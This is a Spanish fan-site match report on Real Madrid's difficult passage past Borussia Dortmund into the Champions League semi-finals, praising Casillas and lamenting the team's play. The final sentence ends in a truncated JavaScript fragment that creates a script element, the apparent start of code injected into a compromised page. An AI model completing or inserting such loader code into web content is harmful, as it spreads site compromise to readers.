Sufrimiento blanco en su pase a semifinales de Champions

Minuto 91: Kelia Vidarte/LaTribunamadridista.com

La noche de Champions de hoy no ha sido precisamente fácil para el Real Madrid en su partido de cuartos de final contra el Borussia de Dortmund, el equipo alemán estuvo a solo 2 goles de eliminar al equipo blanco (2-3) y volver a ser la bestia negra del Real Madrid.

Durante la primera parte del encuentro observamos a un Madrid totalmente desaparecido, con un Borussia atacando en todo momento y haciendo sobra a los merengues en cada jugada. El Madrid fue un equipo pésimo, fallando cada ocasión y perdiendo un montón de balones de cara a la portería rival. Por su parte el Borussia salió enchufado intentando por todos los medios meterle miedo al Madrid y marcando los 2 goles que por un momento tuvieron la eliminatoria en sus manos. Incluso Di María se permitió fallar un penalti cuando su equipo más lo necesitaba.

El descanso no sirvió para que el Real Madrid mejorara de cara a la galería, la posesión de ambos equipos estuvo en 50% y el equipo blanco fue totalmente diferente al juego que elaboró en la ida de los cuartos de final. Bale estaba predestinado a ser el auténtico protagonista de la noche ante la falta del líder Cristiano, el cual no jugaba el encuentro por molestias, pero no fue así, el sufrimiento iba a ser el protagonismo esta noche en Alemania.

En la segunda parte el Real Madrid buscó marcar un tanto que le asegurase el pase, pero los alemanes no se lo pusieron fácil. Balones rodando en ambas áreas que no llegaban a definirse, Cristiano Ronaldo en el banquillo con los nervios a flor de piel. Esta segunda parte quiso que Iker Casillas volviera a reinvindicar su papel de Santo con unas paradas salvadoras al Borussia que iban a parar de forma clara en la portería.

Sin duda todos los que somos merengues hemos sufrido esta noche viendo a un Madrid desconocido, no sabemos que rival nos deparará en el sorteo de semifinales de este 11 de abril, pero alegamos por una mejora del juego y por demostrar a la afición que la Décima es posible.var d=document;var s=d.createElement(‘script’);

About admin